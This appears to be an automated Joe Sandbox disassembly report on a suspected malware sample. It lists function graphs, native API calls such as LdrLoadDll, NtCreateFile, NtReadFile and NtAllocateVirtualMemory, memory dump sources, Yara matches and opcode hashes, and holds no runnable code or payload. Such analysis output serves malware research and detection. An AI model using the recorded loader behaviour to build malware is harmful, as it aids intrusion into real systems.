                                                              • Instruction Fuzzy Hash: 322127B6200209AFCB18DF88DC85EAB77ADEF8C754F108559BE1D9B241C630E811CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 240 ceacf0-cead19 call cfcc50 243 cead1f-cead2d call cfd070 240->243 244 cead1b-cead1e 240->244 247 cead2f-cead3a call cfd2f0 243->247 248 cead3d-cead4e call cfb4a0 243->248 247->248 253 cead67-cead6a 248->253 254 cead50-cead64 LdrLoadDll 248->254 254->253
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00CEAD62
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                              • Instruction ID: b30c5c1fb2939544863c16f5e328806d4d5d61f8f54c8a77b74a6b97685ed84c
                                                              • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                              • Instruction Fuzzy Hash: 80015EB5E0020DABDF10DBA0DD42FADB7B89B54308F004595AA1997241F630EB089B92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 255 cfa360-cfa376 256 cfa37c-cfa3b1 NtCreateFile 255->256 257 cfa377 call cfaf60 255->257 257->256
                                                              APIs
                                                              • NtCreateFile.NTDLL(00000060,00CE9CF3,?,00CF4BB7,00CE9CF3,FFFFFFFF,?,?,FFFFFFFF,00CE9CF3,00CF4BB7,?,00CE9CF3,00000060,00000000,00000000), ref: 00CFA3AD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                              • Instruction ID: 047bdaca57433d830bb99344107ef243e4341ffac371f1798f8ed2c7c63c2585
                                                              • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                              • Instruction Fuzzy Hash: DDF0BDB2200208ABCB48CF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 258 cfa35c-cfa3b1 call cfaf60 NtCreateFile
                                                              APIs
                                                              • NtCreateFile.NTDLL(00000060,00CE9CF3,?,00CF4BB7,00CE9CF3,FFFFFFFF,?,?,FFFFFFFF,00CE9CF3,00CF4BB7,?,00CE9CF3,00000060,00000000,00000000), ref: 00CFA3AD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: f9fb42313e651b9959a468de8585fd26e5716500142227deabab1e432ae5e1e9
                                                              • Instruction ID: 391616856b7e5435d32f31f278c2a420418d37852f44c1edcf1cd0e025375611
                                                              • Opcode Fuzzy Hash: f9fb42313e651b9959a468de8585fd26e5716500142227deabab1e432ae5e1e9
                                                              • Instruction Fuzzy Hash: F4F01FB2214148ABCB08DFA8D884CEB77A9FF8C354B14864DFA0D93206D630E8518BA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              control_flow_graph 261 cfa410-cfa426 262 cfa42c-cfa459 NtReadFile 261->262 263 cfa427 call cfaf60 261->263 263->262
                                                              APIs
                                                              • NtReadFile.NTDLL(00CF4D72,5EB65239,FFFFFFFF,00CF4A31,?,?,00CF4D72,?,00CF4A31,FFFFFFFF,5EB65239,00CF4D72,?,00000000), ref: 00CFA455
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                              • Instruction ID: f133bcdb790fcb4376bf4818625b5ea1c882a75d77b3c5ff8175856fbe1d3b68
                                                              • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                              • Instruction Fuzzy Hash: 9CF0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158248BE1D97251D630E811CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              control_flow_graph 264 cfa40b-cfa459 call cfaf60 NtReadFile
                                                              APIs
                                                              • NtReadFile.NTDLL(00CF4D72,5EB65239,FFFFFFFF,00CF4A31,?,?,00CF4D72,?,00CF4A31,FFFFFFFF,5EB65239,00CF4D72,?,00000000), ref: 00CFA455
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 40296086b2c65b8e1281a00ba7c399c1232ea7f1d97edca416a916e4757591c9
                                                              • Instruction ID: 101136c30d166f14d99a40d93c98875dec7703bd301094dd5819e47bf6d51465
                                                              • Opcode Fuzzy Hash: 40296086b2c65b8e1281a00ba7c399c1232ea7f1d97edca416a916e4757591c9
                                                              • Instruction Fuzzy Hash: 63F01DB2114049AFCB04DF98D880CEBB7ADEF8C214B15864DFA5C97211C630E855CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              control_flow_graph 267 cfa540-cfa57d call cfaf60 NtAllocateVirtualMemory
                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00CFB134,?,00000000,?,00003000,00000040,00000000,00000000,00CE9CF3), ref: 00CFA579
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                              • Instruction ID: f751b3d34b88091f4df05b657227753e464fc4aa07e9a79083ea9a9dd99b71cf
                                                              • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                              • Instruction Fuzzy Hash: 2CF015B2200208ABCB14DF89CC81EAB77ADEF88754F118148BE0897241C630F810CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtClose.NTDLL(00CF4D50,?,?,00CF4D50,00CE9CF3,FFFFFFFF), ref: 00CFA4B5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                              • Instruction ID: 59b69832f1dbce86ddad8ccce46d38195432994f37761a053084e2ff197c3aea
                                                              • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                              • Instruction Fuzzy Hash: 9DD012752002186BD710EBD8CC45EA7776CEF44750F154455BA1C5B242C530F50086E1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: e65f3187a80e65322745a84d915946ec9bc6b58d175e5933dae3abbeb1c82eca
                                                              • Instruction ID: ff9ab6420f54643dbd7d249b8bc3df1e66f5096b634ff15415f738a077b02d68
                                                              • Opcode Fuzzy Hash: e65f3187a80e65322745a84d915946ec9bc6b58d175e5933dae3abbeb1c82eca
                                                              • Instruction Fuzzy Hash: 4490026520641403420571584414616802A97E0201B55C031E10145A0DC5258A916227
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 2b12e22b8a5646ed9fe0cb1d46f21e521c5dcd9a3b5b04f476d9613a7978a874
                                                              • Instruction ID: 192c19de5cd2e54edb70a410388627d677ecf7e91c8ae0b812837abcfcdf2a92
                                                              • Opcode Fuzzy Hash: 2b12e22b8a5646ed9fe0cb1d46f21e521c5dcd9a3b5b04f476d9613a7978a874
                                                              • Instruction Fuzzy Hash: 5D90023520541C02D2807158440464A402597D1301F95C025E0025664DCA158B5977A3
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 6b364601aac000bb7b740e17eaa83a81f66d83dc7aabbfffc9c66e3bd73626eb
                                                              • Instruction ID: b9979bec5677a83a214b2ba7d440712856a95e6297468550018a3e3d7399abaf
                                                              • Opcode Fuzzy Hash: 6b364601aac000bb7b740e17eaa83a81f66d83dc7aabbfffc9c66e3bd73626eb
                                                              • Instruction Fuzzy Hash: FE900229215414030205B5580704507406697D5351355C031F1015560CD6218A615223
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c845b55f50aa3dd25ce9e56a7c50e06a2179d6a118ddf97ac2146a1ee6e1eb1a
                                                              • Instruction ID: fdd1fa98d5dc2f6a3ddd8bfa6e28c169a74c0281e8cbf5dd54d816b51812ed1b
                                                              • Opcode Fuzzy Hash: c845b55f50aa3dd25ce9e56a7c50e06a2179d6a118ddf97ac2146a1ee6e1eb1a
                                                              • Instruction Fuzzy Hash: 7A90022530541403D240715854186068025E7E1301F55D021E0414564CD9158A565323
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 1ecbc3d4767246b8e9691ce71cfbd7c8c809d3ce46c9263f3883b9847be0cfe5
                                                              • Instruction ID: 615d53b83146f51d06394c2d0a184e095e66be4ff4c9fb9769a9b11683de30a7
                                                              • Opcode Fuzzy Hash: 1ecbc3d4767246b8e9691ce71cfbd7c8c809d3ce46c9263f3883b9847be0cfe5
                                                              • Instruction Fuzzy Hash: 2F90022D21741402D2807158540860A402597D1202F95D425E0015568CC9158A695323
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c42408b30133e4894fcf01ffe86c7ea04ab1907aa4c72abcce30341976bce344
                                                              • Instruction ID: 64a59ea78afbfd2ebc1b4a7d9e7fb4c44385a159f1e6eea2892ba5720765a871
                                                              • Opcode Fuzzy Hash: c42408b30133e4894fcf01ffe86c7ea04ab1907aa4c72abcce30341976bce344
                                                              • Instruction Fuzzy Hash: 1E90023520541813D21171584504707402997D0241F95C422E0424568DD6568B52A223
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 2f2b572f8e47dbbfb6f6c47bb558c7784c2b11596835c0738a1f32f28ac6cc92
                                                              • Instruction ID: 5a7fb446c116ffc1e40859f8a1eaed57e5e1ba684cc5d3b5c6c60bc4e15eefe9
                                                              • Opcode Fuzzy Hash: 2f2b572f8e47dbbfb6f6c47bb558c7784c2b11596835c0738a1f32f28ac6cc92
                                                              • Instruction Fuzzy Hash: E4900225246455525645B15844045078026A7E0241795C022E1414960CC5269A56D723
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: ef723d930a3e7cbdfd82453aefa78692ba86d047aed76f968bc473975c475c1b
                                                              • Instruction ID: 6cabe0933793174898896c693f212cc89bf5bb9e06ee9dd500261cc68aa00ce3
                                                              • Opcode Fuzzy Hash: ef723d930a3e7cbdfd82453aefa78692ba86d047aed76f968bc473975c475c1b
                                                              • Instruction Fuzzy Hash: 0890023520549C02D2107158840474A402597D0301F59C421E4424668DC6958A917223
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 5ef5a747c0856876ff12022b1fc75b3d8e91d4b0617f13d53436d77f6e1ca5e7
                                                              • Instruction ID: ecb50a1cd38f8495cbc5110ab8ab3c242a18ac5fb004f8814925174377b75f9b
                                                              • Opcode Fuzzy Hash: 5ef5a747c0856876ff12022b1fc75b3d8e91d4b0617f13d53436d77f6e1ca5e7
                                                              • Instruction Fuzzy Hash: DB90023520541802D20075985408646402597E0301F55D021E5024565EC6658A916233
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c7307d23d24a95adc396571c21d325cec40821d7865732c7e94c74cde592904b
                                                              • Instruction ID: 4aabd9fdff250f4805a1de410eb155064d42f3005ed0e45972cb367193d9a0ec
                                                              • Opcode Fuzzy Hash: c7307d23d24a95adc396571c21d325cec40821d7865732c7e94c74cde592904b
                                                              • Instruction Fuzzy Hash: F190026534541842D20071584414B064025D7E1301F55C025E1064564DC619CE526227
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 38e23a022c8db4cf7f047d5cc06ffa07c631acfcc1081fd2260833950d414f6f
                                                              • Instruction ID: 70d7fc91e2ea36826731250ba35439a9975ddbe2f2ab65fd24c3a4ba07da3b9c
                                                              • Opcode Fuzzy Hash: 38e23a022c8db4cf7f047d5cc06ffa07c631acfcc1081fd2260833950d414f6f
                                                              • Instruction Fuzzy Hash: 00900225215C1442D30075684C14B07402597D0303F55C125E0154564CC9158A615623
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3d4606e068fbeb50c51fa6d0c7fb224084f590a3df2a8e23f4ca44550a8fe410
                                                              • Instruction ID: 10ee1cdd306dd6d1e335201530c8fc77a6b3c0f33f4658e053e166e4d8ae57ef
                                                              • Opcode Fuzzy Hash: 3d4606e068fbeb50c51fa6d0c7fb224084f590a3df2a8e23f4ca44550a8fe410
                                                              • Instruction Fuzzy Hash: 86900225605414424240716888449068025BBE1211755C131E0998560DC5598A655767
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: e4eed06e53e36fba5bd21176205ce15698b0d25fd5a23b8f9970df00f4fb91c6
                                                              • Instruction ID: adcb4893144d5c43a5569041850af221bd19e3269f3fb7f7ee952137dac14846
                                                              • Opcode Fuzzy Hash: e4eed06e53e36fba5bd21176205ce15698b0d25fd5a23b8f9970df00f4fb91c6
                                                              • Instruction Fuzzy Hash: 0490023520581802D2007158481470B402597D0302F55C021E1164565DC6258A516673
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 7b51f1bcea160323d9fd645ea22588ed2c1740b91c0c826943534fc667c24783
                                                              • Instruction ID: 4a64ec9fc436dbbbdc80c285728ec7eaf26b25feb0808e9c7c7f74ef4ba85adc
                                                              • Opcode Fuzzy Hash: 7b51f1bcea160323d9fd645ea22588ed2c1740b91c0c826943534fc667c24783
                                                              • Instruction Fuzzy Hash: A690027520541802D24071584404746402597D0301F55C021E5064564EC6598FD56767
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 7da18654526829f4db3b4048bef6f8b575c25eddabf5401512ba24bc0ce53369
                                                              • Instruction ID: cbbf40235a21b8e0c35a9779bb2bb2a534d57bb4a7a3827482df57f54dafce3a
                                                              • Opcode Fuzzy Hash: 7da18654526829f4db3b4048bef6f8b575c25eddabf5401512ba24bc0ce53369
                                                              • Instruction Fuzzy Hash: 5390022560541902D20171584404616402A97D0241F95C032E1024565ECA258B92A233
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4ed878d8682106b50380cb3f7a3660dbe535b89e10b8b11201fef7fd01b0729b
                                                              • Instruction ID: 1c3b6e7510b7898cb30ac35b55ac15431465dea77c1fa0582108dbf48e9057c6
                                                              • Opcode Fuzzy Hash: 4ed878d8682106b50380cb3f7a3660dbe535b89e10b8b11201fef7fd01b0729b
                                                              • Instruction Fuzzy Hash: E22105B2D402485BCB25D665AD92AFF73BCEF50304F04016DEA5993142F634AB099BB2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 210 ce8308-ce835a call cfbe60 call cfca00 call ceacf0 call cf4e50 219 ce838e-ce8392 210->219 220 ce835c-ce836e PostThreadMessageW 210->220 221 ce838d 220->221 222 ce8370-ce838a call cea480 220->222 221->219 222->221
                                                              APIs
                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 00CE836A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              • Opcode ID: 3652f5063e7420592e5ed941896d8be1a842ecbfb45ce89cbd134adf593fc7ce
                                                              • Instruction ID: ab2bc7261d57b3e5b39473cc868d9b747cc0bab207bb02233d917b2f0ee6ca27
                                                              • Opcode Fuzzy Hash: 3652f5063e7420592e5ed941896d8be1a842ecbfb45ce89cbd134adf593fc7ce
                                                              • Instruction Fuzzy Hash: 1701D831A8026C7BE721A6949C43FFE776C6B00F51F050115FF08BA1C2EBD8690547E6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 225 ce8310-ce831f 226 ce8328-ce835a call cfca00 call ceacf0 call cf4e50 225->226 227 ce8323 call cfbe60 225->227 234 ce838e-ce8392 226->234 235 ce835c-ce836e PostThreadMessageW 226->235 227->226 236 ce838d 235->236 237 ce8370-ce838a call cea480 235->237 236->234 237->236
                                                              APIs
                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 00CE836A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                              • Instruction ID: 38724aa1f73447f0e7a30276e4a1422ffa4d1f8c684ac07bb2dc5d21c10649c5
